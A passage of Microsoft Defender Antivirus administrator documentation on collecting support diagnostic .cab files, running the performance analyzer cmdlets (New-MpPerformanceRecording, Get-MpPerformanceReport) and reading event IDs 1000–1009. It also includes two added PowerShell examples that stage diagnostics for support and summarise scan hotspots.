<path>\<MMDD>\MpSupport-<hostname>-<HHMM>.cab

Field      Description
path       The path as specified on the command line or retrieved from configuration
MMDD       Month and day when the diagnostic data was collected (for example, 0530)
hostname   The hostname of the device on which the diagnostic data was collected
HHMM       Hours and minutes when the diagnostic data was collected (for example, 1422)

7 Note

When using a file share, make sure that the account used to collect the diagnostic package has write access to the share.

Specify location where diagnostic data is created

You can also specify where the diagnostic .cab file is created using a Group Policy Object (GPO).

1. Open the Local Group Policy Editor and locate the SupportLogLocation policy. The value it configures is stored in the registry at HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\SupportLogLocation .

2. Select Define the directory path to copy support log files.

3. Inside the policy editor, select Enabled.

4. Specify the directory path where you want to copy the support log files in the Options field.

5. Select OK or Apply.
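The collection procedure above, the -SupportLogLocation redirect, and the policy-defined location can be driven from one PowerShell script. The following is an added example, not code from the Microsoft documentation or from the product: it locates MpCmdRun.exe (newest platform folder first, then the legacy path), runs -GetFiles, finds the resulting .cab in the documented folder layout, and hashes it so support can verify the copy they receive. It assumes it runs elevated, that the destination folder or share is writable by the account running it, that MpCmdRun.exe returns a non-zero exit code on failure, and that the policy stores a registry value named SupportLogLocation under the key shown above; \\fileserver\DefenderLogs is a placeholder share name.

```powershell
# Added example (not from the Microsoft documentation): collect the Microsoft
# Defender Antivirus support package with MpCmdRun.exe and stage it for support.
# Assumptions (this example's): runs elevated; $Destination is writable by the
# current account; MpCmdRun.exe exits non-zero on failure; platform folders are
# named like 4.18.24010.12-0 (version plus a "-N" suffix).

function Get-MpCmdRunPath {
    # Prefer the newest antimalware platform folder under ProgramData; fall back
    # to the legacy install location. Both locations are the ones named above.
    $platformRoot = 'C:\ProgramData\Microsoft\Windows Defender\Platform'
    if (Test-Path -Path $platformRoot) {
        $latest = Get-ChildItem -Path $platformRoot -Directory |
            Sort-Object -Property { try { [version]($_.Name -replace '-.*$', '') } catch { [version]'0.0' } } -Descending |
            Select-Object -First 1
        if ($latest) {
            $candidate = Join-Path -Path $latest.FullName -ChildPath 'MpCmdRun.exe'
            if (Test-Path -Path $candidate) { return $candidate }
        }
    }
    $legacy = 'C:\Program Files\Windows Defender\MpCmdRun.exe'
    if (Test-Path -Path $legacy) { return $legacy }
    throw 'MpCmdRun.exe was not found in the platform or legacy locations.'
}

function Get-MpSupportLogPolicy {
    # Reads the value set by the "Define the directory path to copy support log
    # files" policy (registry key from the text above; assumed to be a value named
    # SupportLogLocation). Returns $null when the policy is not configured.
    $key  = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'
    $item = Get-ItemProperty -Path $key -Name 'SupportLogLocation' -ErrorAction SilentlyContinue
    if ($item) { $item.SupportLogLocation } else { $null }
}

function Invoke-MpSupportCollection {
    param(
        # Folder or UNC share; omit to let MpCmdRun use its default or the policy location.
        [string]$Destination
    )
    $mpCmdRun = Get-MpCmdRunPath
    $cmdArgs  = @('-GetFiles')
    if ($Destination) {
        if (-not (Test-Path -Path $Destination)) {
            New-Item -ItemType Directory -Path $Destination -Force | Out-Null
        }
        $cmdArgs += @('-SupportLogLocation', $Destination)
    }

    $output = & $mpCmdRun @cmdArgs 2>&1
    if ($LASTEXITCODE -ne 0) {
        throw "MpCmdRun.exe -GetFiles failed (exit code $LASTEXITCODE):`n$($output -join "`n")"
    }

    # Layout per the text above: <path>\<MMDD>\MpSupport-<hostname>-<HHMM>.cab when
    # -SupportLogLocation is given, otherwise MpSupportFiles.cab under ProgramData.
    if ($Destination) {
        $cab = Get-ChildItem -Path $Destination -Recurse -Filter 'MpSupport-*.cab' |
            Sort-Object -Property LastWriteTime -Descending | Select-Object -First 1
    } else {
        $cab = Get-Item -Path 'C:\ProgramData\Microsoft\Windows Defender\Support\MpSupportFiles.cab' -ErrorAction SilentlyContinue
    }
    if (-not $cab) { throw 'MpCmdRun reported success but no support .cab was found.' }

    # Hash the package before it leaves the device so the copy handed to support
    # can be checked against what was actually collected.
    [pscustomobject]@{
        ComputerName = $env:COMPUTERNAME
        CabPath      = $cab.FullName
        SizeBytes    = $cab.Length
        Sha256       = (Get-FileHash -Path $cab.FullName -Algorithm SHA256).Hash
        Collected    = $cab.LastWriteTime
    }
}

# Usage: show the policy-configured location (if any), then collect to a share.
# The share name is a placeholder for this example.
Get-MpSupportLogPolicy
Invoke-MpSupportCollection -Destination '\\fileserver\DefenderLogs' | Format-List
```

Run it on each affected device and keep the returned object with the ticket: the SHA-256 lets support confirm the package was not altered between collection and upload, and the folder-per-day layout keeps packages from several hosts apart on the share.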


See also
Troubleshoot Microsoft Defender Antivirus reporting
Performance analyzer for Microsoft Defender Antivirus




Collect update compliance diagnostic
data for Microsoft Defender Antivirus
assessment
Article • 08/22/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

This article describes how to collect diagnostic data that's used by Microsoft support
and engineering teams when they help with troubleshooting issues with Microsoft
Defender Antivirus.

7 Note

For performance-specific issues related to Microsoft Defender Antivirus, see: Performance analyzer for Microsoft Defender Antivirus.

Before attempting this process, ensure that you have read Troubleshoot Microsoft Defender Antivirus reporting, met all required prerequisites, and taken any other suggested troubleshooting steps.

Obtain the diagnostic file

On at least two devices that aren't reporting or showing up in Update Compliance, obtain the .cab diagnostic file by taking the following steps:

1. Open Command Prompt as an administrator by following these steps:

a. Open the Start menu.

b. Type cmd. Right-click on Command Prompt and then select Run as administrator.

c. Specify administrator credentials or approve the prompt.

2. Navigate to the Windows Defender directory. By default, it's C:\Program Files\Windows Defender .
3. Type the following command, and then press Enter

Dos

mpcmdrun -getfiles

4. A .cab file is generated that contains various diagnostic logs. The location of the
file is specified in the output in the command prompt. By default, the location is
C:\ProgramData\Microsoft\Windows Defender\Support\MpSupportFiles.cab .

5. Copy the .cab files to a location that can be accessed by Microsoft support. An
example could be a password-protected OneDrive folder that you can share.

6. Send an email using the update compliance support email template, and fill out the template with the following information:

text

I am encountering the following issue when using Microsoft Defender Antivirus in Update Compliance:

I have provided at least 2 support .cab files at the following location: <accessible share, including access details such as password>

My OMS workspace ID is:

Please contact me at:

See also
Troubleshoot Microsoft Defender Antivirus reporting
Performance analyzer for Microsoft Defender Antivirus




Performance analyzer for Microsoft
Defender Antivirus
Article • 02/16/2024

Applies to

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Antivirus

Platforms

Windows

Requirements
Microsoft Defender Antivirus performance analyzer has the following prerequisites:

Supported Windows versions: Windows 10, Windows 11, Windows Server 2012 R2 with the Modern Unified Solution, and Windows Server 2016 and above
Platform Version: 4.18.2108.7 or later
PowerShell Version: PowerShell 5.1, PowerShell ISE, remote PowerShell (platform 4.18.2201.10 or later), PowerShell 7.x (platform 4.18.2201.10 or later)

What is Microsoft Defender Antivirus performance analyzer?
If computers running Microsoft Defender Antivirus are experiencing performance issues,
you can use performance analyzer to improve the performance of Microsoft Defender
Antivirus. Performance analyzer for Microsoft Defender Antivirus in Windows 10,
Windows 11, and Windows Server, is a PowerShell command-line tool that helps you
determine files, file extensions, and processes that might be causing performance issues
on individual endpoints during antivirus scans. You can use the information gathered by
performance analyzer to assess performance issues and apply remediation actions.

Similar to the way mechanics perform diagnostics and service on a vehicle that has
performance problems, performance analyzer can help you improve Defender Antivirus
performance.

Some options to analyze include:

Top paths that impact scan time
Top files that impact scan time
Top processes that impact scan time
Top file extensions that impact scan time
Combinations – for example:
top files per extension
top paths per extension
top processes per path
top scans per file
top scans per file per process

Running performance analyzer

The high-level process for running performance analyzer involves the following steps:

1. Run performance analyzer to collect a performance recording of Microsoft Defender Antivirus events on the endpoint.

7 Note

Microsoft Defender Antivirus events of the type Microsoft-Antimalware-Engine are recorded by the performance analyzer.

2. Analyze the scan results using different recording reports.

Using performance analyzer

To start recording system events, open PowerShell in administrative mode and perform the following steps:

1. Run the following command to start the recording:

PowerShell

New-MpPerformanceRecording -RecordTo <recording.etl>

where the -RecordTo parameter specifies the full path of the location in which the trace file is saved. For more cmdlet information, see Microsoft Defender Antivirus cmdlets.

2. If there are processes or services thought to be affecting performance, reproduce the situation by carrying out the relevant tasks.

3. Press ENTER to stop and save the recording, or Ctrl+C to cancel the recording.

4. Analyze the results using the performance analyzer's Get-MpPerformanceReport cmdlet. For example, running Get-MpPerformanceReport -Path <recording.etl> -TopFiles 3 -TopScansPerFile 10 lists the top ten scans for each of the top three files affecting performance.

For more information on command-line parameters and options, see New-MpPerformanceRecording and Get-MpPerformanceReport.

7 Note

When starting a recording, if you get the error "Cannot start performance recording because Windows Performance Recorder is already recording", stop the existing trace with the following command and then start the new recording: wpr -cancel -instancename MSFT_MpPerformanceRecording

Performance tuning data and information

Based on the query, the user is able to view data for scan counts, duration (total/min/average/max/median), path, process, and reason for scan. The following image shows sample output for a simple query of the top 10 files for scan impact.

Additional functionality: exporting and converting to CSV and JSON

The results of the performance analyzer can also be exported and converted to a CSV or JSON file. The following sections show the "export" and "convert" steps with sample code.

Starting with Defender version 4.18.2206.X , users are able to view scan skip reason
information under "SkipReason" column. The possible values are:

Not Skipped
Optimization (typically due to performance reasons)
User skipped (typically due to user-set exclusions)

For CSV
To export:

PowerShell

(Get-MpPerformanceReport -Path .\Repro-Install.etl -TopScans 1000).TopScans | Export-Csv -Path .\Repro-Install-Scans.csv -Encoding UTF8 -NoTypeInformation

To convert:

PowerShell

(Get-MpPerformanceReport -Path .\Repro-Install.etl -TopScans 100).TopScans | ConvertTo-Csv -NoTypeInformation

For JSON
To convert:

PowerShell

(Get-MpPerformanceReport -Path .\Repro-Install.etl -TopScans 1000).TopScans | ConvertTo-Json -Depth 1

To ensure machine-readable output for exporting with other data processing systems,
it's recommended to use -Raw parameter for Get-MpPerformanceReport . See the
following sections for more details.
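The recording steps in "Using performance analyzer", the Windows Performance Recorder conflict note, and the export and convert patterns above fit together as one triage script. The following is an added example, not code from the Microsoft documentation or from the product. It aggregates the recorded scans by process and by directory (total time, not just the single longest scan), writes the CSV and JSON copies, and returns a summary object. It assumes the objects in .TopScans expose Path, Process, Duration (as a TimeSpan) and SkipReason properties; the text above names those columns but not their types. The .etl file name is a placeholder. The output identifies what to investigate; it does not recommend exclusions, which reduce protection.

```powershell
# Added example (not from the Microsoft documentation): summarise a recording
# made with New-MpPerformanceRecording so the costliest processes and directories
# stand out, and write the CSV/JSON copies shown above.
# Assumptions (this example's): .TopScans objects expose Path, Process,
# Duration (TimeSpan) and SkipReason; "Not Skipped" is the documented value for
# scans that actually ran.

function Stop-StaleMpRecording {
    # New-MpPerformanceRecording refuses to start while an earlier Windows
    # Performance Recorder trace with this instance name is still active
    # (troubleshooting note above). Cancelling when nothing is running is harmless.
    $null = & wpr.exe -cancel -instancename MSFT_MpPerformanceRecording 2>&1
}

function Get-MpScanHotspots {
    param(
        [Parameter(Mandatory)] [string]$Recording,
        [string]$MinDuration = '100ms',   # drop scans shorter than this
        [int]$Top = 10,
        [string]$OutDir = '.'
    )
    # -Raw keeps the objects serialisable; the nested Top* parameters give the
    # per-process and per-path breakdowns in one pass over the trace.
    $report = Get-MpPerformanceReport -Path $Recording -Raw `
        -TopScans 1000 -TopFiles $Top -TopProcesses $Top -TopExtensions $Top `
        -TopPaths $Top -TopPathsDepth 3 -MinDuration $MinDuration

    $scans     = @($report.TopScans)
    # Skipped scans cost no engine time, so only scans that ran are aggregated.
    $performed = @($scans | Where-Object { $_.SkipReason -eq 'Not Skipped' })

    $sumSeconds = { param($group)
        [math]::Round((($group | ForEach-Object { $_.Duration.TotalSeconds }) |
            Measure-Object -Sum).Sum, 2)
    }

    # A single long scan may be a one-off; repeated scans of the same tree under
    # the same process are what a tuning decision should be based on.
    $byProcess = $performed | Group-Object -Property Process | ForEach-Object {
        [pscustomobject]@{ Process = $_.Name; Scans = $_.Count; TotalSeconds = & $sumSeconds $_.Group }
    } | Sort-Object -Property TotalSeconds -Descending | Select-Object -First $Top

    $byDir = $performed |
        Group-Object -Property { if ($_.Path) { Split-Path -Path $_.Path -Parent } else { '<unknown>' } } |
        ForEach-Object {
            [pscustomobject]@{ Directory = $_.Name; Scans = $_.Count; TotalSeconds = & $sumSeconds $_.Group }
        } | Sort-Object -Property TotalSeconds -Descending | Select-Object -First $Top

    # Machine-readable copies for a ticket or SIEM (the export and convert patterns above).
    $stem = [IO.Path]::GetFileNameWithoutExtension($Recording)
    $scans  | Export-Csv -Path (Join-Path $OutDir "$stem-scans.csv") -Encoding UTF8 -NoTypeInformation
    $report | ConvertTo-Json -Depth 4 | Set-Content -Path (Join-Path $OutDir "$stem-report.json") -Encoding UTF8

    [pscustomobject]@{
        Recording      = $Recording
        ScansRecorded  = $scans.Count
        ScansPerformed = $performed.Count
        TopProcesses   = $byProcess
        TopDirectories = $byDir
    }
}

# Usage: clear a stale trace, record (interactive: reproduce the slowness, then
# press ENTER), then analyse. The .etl name is a placeholder.
Stop-StaleMpRecording
New-MpPerformanceRecording -RecordTo .\Defender-scans.etl
$summary = Get-MpScanHotspots -Recording .\Defender-scans.etl -MinDuration '50ms'
$summary.TopProcesses   | Format-Table -AutoSize
$summary.TopDirectories | Format-Table -AutoSize
```

Aggregating by directory and process rather than by single scan is deliberate: the top-scans list is sorted by the longest individual scan, while the cost users feel is usually many short scans of the same build or log tree. Compare TotalSeconds across the two tables before deciding whether anything needs tuning, and treat every candidate as a finding to investigate, not as an exclusion to add.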

PowerShell reference
There are two new PowerShell cmdlets used to tune performance of Microsoft Defender
Antivirus:

New-MpPerformanceRecording
Get-MpPerformanceReport

New-MpPerformanceRecording
The following section describes the reference for the new PowerShell cmdlet New-MpPerformanceRecording. This cmdlet collects a performance recording of Microsoft Defender Antivirus scans.

Syntax: New-MpPerformanceRecording

PowerShell

New-MpPerformanceRecording -RecordTo <String>

Description: New-MpPerformanceRecording

The New-MpPerformanceRecording cmdlet collects a performance recording of Microsoft Defender Antivirus scans. These performance recordings contain Microsoft-Antimalware-Engine and NT kernel process events and can be analyzed after collection using the Get-MpPerformanceReport cmdlet.

This New-MpPerformanceRecording cmdlet provides an insight into problematic files that could cause a degradation in the performance of Microsoft Defender Antivirus. This tool is provided "AS IS", and isn't intended to provide suggestions on exclusions. Exclusions can reduce the level of protection on your endpoints. Exclusions, if any, should be defined with caution.

For more information on the performance analyzer, see Performance Analyzer docs.

) Important

This cmdlet requires elevated administrator privileges.

Examples: New-MpPerformanceRecording

Example 1: Collect a performance recording and save it

PowerShell

New-MpPerformanceRecording -RecordTo .\Defender-scans.etl

The above command collects a performance recording and saves it to the specified path: .\Defender-scans.etl.

Example 2: Collect a performance recording for a remote PowerShell session

PowerShell

$s = New-PSSession -ComputerName Server02 -Credential Domain01\User01
New-MpPerformanceRecording -RecordTo C:\LocalPathOnServer02\trace.etl -Session $s

The above command collects a performance recording on Server02 (as specified by argument $s of parameter Session) and saves it to the specified path: C:\LocalPathOnServer02\trace.etl on Server02.

Parameters: New-MpPerformanceRecording

-RecordTo

Specifies the location in which to save the Microsoft Defender Antimalware performance recording.

YAML

Type: String
Position: Named
Default value: None
Accept pipeline input: False
Accept wildcard characters: False

-Session

Specifies the PSSession object in which to create and save the Microsoft Defender Antivirus performance recording. When you use this parameter, the RecordTo parameter refers to the local path on the remote machine. Available with Defender platform version 4.18.2201.10 or later.

YAML

Type: PSSession[]
Position: 0
Default value: None
Accept pipeline input: False
Accept wildcard characters: False

Get-MpPerformanceReport
The following section describes the Get-MpPerformanceReport PowerShell cmdlet.
Analyzes and reports on Microsoft Defender Antivirus performance recording.

Syntax: Get-MpPerformanceReport

PowerShell

Get-MpPerformanceReport [-Path] <String>
[-TopScans [<Int32>]]
[-TopPaths [<Int32>] [-TopPathsDepth [<Int32>]]]
[-TopScansPerPath [<Int32>]]
[-TopFilesPerPath [<Int32>]
[-TopScansPerFilePerPath [<Int32>]]
]
[-TopExtensionsPerPath [<Int32>]
[-TopScansPerExtensionPerPath [<Int32>]]
]
[-TopProcessesPerPath [<Int32>]
[-TopScansPerProcessPerPath [<Int32>]]
]
]
[-TopFiles [<Int32>]
[-TopScansPerFile [<Int32>]]
[-TopProcessesPerFile [<Int32>]
[-TopScansPerProcessPerFile [<Int32>]]
]
]
[-TopExtensions [<Int32>]
[-TopScansPerExtension [<Int32>]
[-TopPathsPerExtension [<Int32>] [-TopPathsDepth [<Int32>]]
[-TopScansPerPathPerExtension [<Int32>]]
]
[-TopProcessesPerExtension [<Int32>]
[-TopScansPerProcessPerExtension [<Int32>]]
]
[-TopFilesPerExtension [<Int32>]
[-TopScansPerFilePerExtension [<Int32>]]
]
]
[-TopProcesses [<Int32>]
[-TopScansPerProcess [<Int32>]]
[-TopExtensionsPerProcess [<Int32>]
[-TopScansPerExtensionPerProcess [<Int32>]]
]
[-TopPathsPerProcess [<Int32>] [-TopPathsDepth [<Int32>]]
[-TopScansPerPathPerProcess [<Int32>]]
]
[-TopFilesPerProcess [<Int32>]
[-TopScansPerFilePerProcess [<Int32>]]
]
]
[-MinDuration <String>]
[-Raw]

Description: Get-MpPerformanceReport
The Get-MpPerformanceReport cmdlet analyzes a previously collected Microsoft Defender
Antivirus performance recording (New-MpPerformanceRecording) and reports the file
paths, file extensions, and processes that cause the highest impact to Microsoft
Defender Antivirus scans.

The performance analyzer provides an insight into problematic files that could cause a
degradation in the performance of Microsoft Defender Antivirus. This tool is provided
"AS IS" and isn't intended to provide suggestions on exclusions. Exclusions can reduce
the level of protection on your endpoints. Exclusions, if any, should be defined with
caution.

For more information on the performance analyzer, see Performance Analyzer docs.

Supported OS versions:
Windows 10 and later.

7 Note

This feature is available starting with platform version 4.18.2108.X and later.

Examples: Get-MpPerformanceReport

Example 1: Single query

PowerShell

Get-MpPerformanceReport -Path .\Defender-scans.etl -TopScans 20

Example 2: Multiple queries

PowerShell

Get-MpPerformanceReport -Path .\Defender-scans.etl -TopFiles 10 -TopExtensions 10 -TopProcesses 10 -TopScans 10

Example 3: Nested queries

PowerShell

Get-MpPerformanceReport -Path .\Defender-scans.etl -TopProcesses 10 -TopExtensionsPerProcess 3 -TopScansPerExtensionPerProcess 3

Example 4: Using -MinDuration parameter

PowerShell

Get-MpPerformanceReport -Path .\Defender-scans.etl -TopScans 100 -MinDuration 100ms

Example 5: Using -Raw parameter

PowerShell

Get-MpPerformanceReport -Path .\Defender-scans.etl -TopFiles 10 -TopExtensions 10 -TopProcesses 10 -TopScans 10 -Raw | ConvertTo-Json

Using -Raw in the above command specifies that the output should be machine
readable and readily convertible to serialization formats like JSON.

Parameters: Get-MpPerformanceReport

-TopPaths

Requests a top-paths report and specifies how many top paths to output, sorted by
Duration. Aggregates the scans based on their path and directory. User can specify how
many directories should be displayed on each level and the depth of the selection.

YAML

Type: Int32
Position: Named
Default value: None
Accept pipeline input: False
Accept wildcard characters: False

-TopPathsDepth

Specifies recursive depth that is used to group and display aggregated path results. For
example "C:" corresponds to a depth of 1, "C:\Users\Foo" corresponds to a depth of 3.

This flag can accompany all other Top Path options. If missing, a default value of 3 is
assumed. Value can't be 0.

YAML

Type: Int32
Position: Named
Default value: 3
Accept pipeline input: False
Accept wildcard characters: False

Flag                            Definition
-TopScansPerPath                Specifies how many top scans to output for each top path.
-TopFilesPerPath                Specifies how many top files to output for each top path.
-TopScansPerFilePerPath         Specifies how many top scans to output for each top file for each top path, sorted by Duration.
-TopExtensionsPerPath           Specifies how many top extensions to output for each top path.
-TopScansPerExtensionPerPath    Specifies how many top scans to output for each top extension for each top path.
-TopProcessesPerPath            Specifies how many top processes to output for each top path.
-TopScansPerProcessPerPath      Specifies how many top scans to output for each top process for each top path.
-TopPathsPerExtension           Specifies how many top paths to output for each top extension.
-TopScansPerPathPerExtension    Specifies how many top scans to output for each top path for each top extension.
-TopPathsPerProcess             Specifies how many top paths to output for each top process.
-TopScansPerPathPerProcess      Specifies how many top scans to output for each top path for each top process.

-MinDuration

Specifies the minimum duration of any scan or total scan durations of files, extensions,
and processes included in the report; accepts values like 0.1234567sec, 0.1234ms, 0.1us,
or a valid TimeSpan.

YAML

Type: String
Position: Named
Default value: None
Accept pipeline input: False
Accept wildcard characters: False

-Path

Specifies the path to the performance recording (.etl file) to analyze.

YAML

Type: String
Position: 0
Default value: None
Accept pipeline input: True
Accept wildcard characters: False

-Raw

Specifies that the output of the performance report should be machine readable and readily convertible to serialization formats like JSON (for example, via the ConvertTo-Json cmdlet). This configuration is recommended for users interested in batch processing with other data processing systems.

YAML

Type: SwitchParameter
Position: Named
Default value: False
Accept pipeline input: False
Accept wildcard characters: False

-TopExtensions

Specifies how many top extensions to output, sorted by Duration.

YAML

Type: Int32
Position: Named
Default value: None
Accept pipeline input: False
Accept wildcard characters: False

-TopExtensionsPerProcess

Specifies how many top extensions to output for each top process, sorted by Duration.

YAML

Type: Int32
Position: Named
Default value: None
Accept pipeline input: False
Accept wildcard characters: False

-TopFiles

Requests a top-files report and specifies how many top files to output, sorted by
Duration.

YAML

Type: Int32
Position: Named
Default value: None
Accept pipeline input: False
Accept wildcard characters: False

-TopFilesPerExtension

Specifies how many top files to output for each top extension, sorted by Duration.

YAML

Type: Int32
Position: Named
Default value: None
Accept pipeline input: False
Accept wildcard characters: False

-TopFilesPerProcess

Specifies how many top files to output for each top process, sorted by Duration.

YAML

Type: Int32
Position: Named
Default value: None
Accept pipeline input: False
Accept wildcard characters: False

-TopProcesses

Requests a top-processes report and specifies how many of the top processes to output,
sorted by Duration.

YAML

Type: Int32
Position: Named
Default value: None
Accept pipeline input: False
Accept wildcard characters: False

-TopProcessesPerExtension

Specifies how many top processes to output for each top extension, sorted by Duration.

YAML

Type: Int32
Position: Named
Default value: None
Accept pipeline input: False
Accept wildcard characters: False

-TopProcessesPerFile

Specifies how many top processes to output for each top file, sorted by Duration.

YAML

Type: Int32
Position: Named
Default value: None
Accept pipeline input: False
Accept wildcard characters: False

-TopScans

Requests a top-scans report and specifies how many top scans to output, sorted by
Duration.

YAML

Type: Int32
Position: Named
Default value: None
Accept pipeline input: False
Accept wildcard characters: False

-TopScansPerExtension

Specifies how many top scans to output for each top extension, sorted by Duration.

YAML

Type: Int32
Position: Named
Default value: None
Accept pipeline input: False
Accept wildcard characters: False

-TopScansPerExtensionPerProcess

Specifies how many top scans to output for each top extension for each top process,
sorted by Duration.

YAML

Type: Int32
Position: Named
Default value: None
Accept pipeline input: False
Accept wildcard characters: False

-TopScansPerFile

Specifies how many top scans to output for each top file, sorted by Duration.

YAML

Type: Int32
Position: Named
Default value: None
Accept pipeline input: False
Accept wildcard characters: False

-TopScansPerFilePerExtension

Specifies how many top scans to output for each top file for each top extension, sorted
by Duration.

YAML

Type: Int32
Position: Named
Default value: None
Accept pipeline input: False
Accept wildcard characters: False

-TopScansPerFilePerProcess

Specifies how many top scans to output for each top file for each top process, sorted by Duration.

YAML

Type: Int32
Position: Named
Default value: None
Accept pipeline input: False
Accept wildcard characters: False

-TopScansPerProcess

Specifies how many top scans to output for each top process in the Top Processes
report, sorted by Duration.

YAML

Type: Int32
Position: Named
Default value: None
Accept pipeline input: False
Accept wildcard characters: False

-TopScansPerProcessPerExtension

Specifies how many top scans to output for each top process for each top extension, sorted by Duration.

YAML

Type: Int32
Position: Named
Default value: None
Accept pipeline input: False
Accept wildcard characters: False

-TopScansPerProcessPerFile

Specifies how many top scans to output for each top process for each top file, sorted by Duration.

YAML

Type: Int32
Position: Named
Default value: None
Accept pipeline input: False
Accept wildcard characters: False

Additional resources
If you're looking for Antivirus-related information for other platforms, see:

Set preferences for Microsoft Defender for Endpoint on macOS
Microsoft Defender for Endpoint on Mac
macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune
Set preferences for Microsoft Defender for Endpoint on Linux
Microsoft Defender for Endpoint on Linux
Configure Defender for Endpoint on Android features
Configure Microsoft Defender for Endpoint on iOS features




Review event logs and error codes to troubleshoot issues with Microsoft Defender Antivirus
FAQ

If you encounter a problem with Microsoft Defender Antivirus, you can search the sections below in this article to find a matching issue and potential solution.

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Antivirus

How do I view a Microsoft Defender Antivirus event?
1. Open Event Viewer.

2. In the console tree, expand Applications and Services Logs > Microsoft >
Windows > Windows Defender.

3. Double-click on Operational.

4. In the details pane, view the list of individual events to find your event.

5. Select the event to see specific details about an event in the lower pane, under the
General and Details tabs.

Event ID 1000
Symbolic name: MALWAREPROTECTION_SCAN_STARTED

Message: An antimalware scan started.

Description:

Scan ID: ID number of the relevant scan.

Scan Type: Scan type. Examples: Antivirus, Antispyware, or Antimalware

Scan Parameters: Scan parameters. Examples: Full scan, Quick scan, or Custom scan

Scan Resources: Resources (such as files/directories/BHO) that were scanned.

User: Domain\User

Event ID 1001
Symbolic name: MALWAREPROTECTION_SCAN_COMPLETED

Message: An antimalware scan finished.

Description:

Scan ID: ID number of the relevant scan.

Scan Type: Scan type. Examples: Antivirus, Antispyware, or Antimalware

Scan Parameters: Scan parameters. Examples: Full scan, Quick scan, or Custom scan

User: Domain\User

Scan Time: The duration of a scan.

Event ID 1002
Symbolic name: MALWAREPROTECTION_SCAN_CANCELLED

Message: An antimalware scan was stopped before it finished.

Description:

Scan ID: ID number of the relevant scan.

Scan Type: Scan type. Examples: Antivirus, Antispyware, or Antimalware

Scan Parameters: Scan parameters. Examples: Full scan, Quick scan, or Custom scan

User: Domain\User

Scan Time: The duration of a scan.


Event ID 1003
Symbolic name: MALWAREPROTECTION_SCAN_PAUSED

Message: An antimalware scan was paused.

Description:

Scan ID: ID number of the relevant scan.

Scan Type: Scan type. Examples: Antivirus, Antispyware, or Antimalware

Scan Parameters: Scan parameters. Examples: Full scan, Quick scan, or Custom scan

User: Domain\User

Event ID 1004
Symbolic name: MALWAREPROTECTION_SCAN_RESUMED

Message: An antimalware scan was resumed.

Description:

Scan ID: ID number of the relevant scan.

Scan Type: Scan type. Examples: Antivirus, Antispyware, or Antimalware

Scan Parameters: Scan parameters. Examples: Full scan, Quick scan, or Custom scan

User: Domain\User

Event ID 1005
Symbolic name: MALWAREPROTECTION_SCAN_FAILED

Message: An antimalware scan failed.

Description:

Scan ID: ID number of the relevant scan.

Scan Type: Scan type. Examples: Antivirus, Antispyware, or Antimalware


Scan Parameters: Scan parameters. Examples: Full scan, Quick scan, or Custom scan

User: Domain\User

Error Code: Error code. Result code associated with threat status. Standard
HRESULT values.

Error Description: Error description. Description of the error.

User action:

The antivirus client encountered an error, and the current scan stopped. The scan might fail due to a client-side issue. This event record includes the scan ID, type of scan (Microsoft Defender Antivirus, antispyware, antimalware), scan parameters, the user that started the scan, the error code, and a description of the error. To troubleshoot this event:

- Run the scan again.

- If it fails in the same way, go to the Microsoft Support site (https://support.microsoft.com/) and enter the error number in the Search box to look for the error code.

- Contact Microsoft Technical Support (/microsoft-365/admin/get-help-support).

Event ID 1006
Symbolic name: MALWAREPROTECTION_MALWARE_DETECTED

Message: The antimalware engine found malware or other potentially unwanted software.

Description: For more information, see the following details:

Name: Threat name

ID: Threat ID

Severity: Severity. Examples: Low, Moderate, High, or Severe

Category: Category description. Examples: Any threat or malware type.

Path: File path

Detection Origin: Detection origin. Examples: Unknown, Local computer, Network share, Internet, Incoming traffic, or Outgoing traffic

Detection Type: Detection type. Examples: Heuristics, Generic, Concrete, or Dynamic signature

Detection Source: Detection source, for example:

User: user initiated

System: system initiated

Real-time: real-time component initiated

IOAV: IE Downloads and Outlook Express Attachments initiated

NIS: Network inspection system

IEPROTECT: IE - IExtensionValidation; this protects against malicious webpage controls.

Early Launch Antimalware (ELAM). This source includes malware detected by the boot sequence.

Remote attestation

Antimalware Scan Interface (AMSI). Primarily used to protect scripts (PowerShell, VBS), though it can be invoked by third parties as well.

UAC (User Account Control)

Status: Status

User: Domain\User

Process Name: Name of the process associated with the detection

Signature Version: Definition version

Engine Version: Antimalware Engine version

Event ID 1007
Symbolic name: MALWAREPROTECTION_MALWARE_ACTION_TAKEN

Message: The antimalware platform performed an action to protect your system from malware or other potentially unwanted software.

Description: Microsoft Defender Antivirus took action to protect this machine from malware or other potentially unwanted software. For more information, see the following details:

User: Domain\User

Name: Threat name

ID: Threat ID

Severity: Severity. Examples: Low, Moderate, High, or Severe

Category: Category description, for example, any threat or malware type.

Action: Action. Examples:

Clean: The resource was cleaned.

Quarantine: The resource was quarantined.

Remove: The resource was deleted.

Allow: The resource was allowed to execute/exist.

User defined: User-defined action that's typically from this list of actions
specified by the user.

No action: No action

Block: The resource was blocked from executing.

Status: Status

Signature Version: Definition version

Engine Version: Antimalware Engine version

Event ID 1008
Symbolic name: MALWAREPROTECTION_MALWARE_ACTION_FAILED

Message: The antimalware platform attempted to perform an action to protect your
system from malware or other potentially unwanted software, but the action failed.

Description: Microsoft Defender Antivirus encountered an error when taking action on
malware or other potentially unwanted software. For more information, see the
following details:

User: Domain\User

Name: Threat name

ID: Threat ID

Severity: Severity. Examples: Low, Moderate, High, or Severe

Category: Category description, for example, any threat or malware type.

Path: File path

Action: Action. Examples:

Clean: The resource was cleaned.

Quarantine: The resource was quarantined.

Remove: The resource was deleted.

Allow: The resource was allowed to execute/exist.

User defined: User-defined action that's typically from this list of actions
specified by the user.

No action: No action

Block: The resource was blocked from executing.

Error Code: Error code. Result code associated with threat status. Standard HRESULT
values.

Error Description: Error description. Description of the error.

Status: Status

Signature Version: Definition version

Engine Version: Antimalware Engine version

Event ID 1009
Symbolic name: MALWAREPROTECTION_QUARANTINE_RESTORE

Message: The antimalware platform restored an item from quarantine.

Description: Microsoft Defender Antivirus restored an item from quarantine. For more
information, see the following details:

Name: Threat name

ID: Threat ID

Severity: Severity. Examples: Low, Moderate, High, or Severe

Category: Category description, for example, any threat or malware type.

Path: File path

User: Domain\User

Signature Version: Definition version

Engine Version: Antimalware Engine version

Event ID 1010
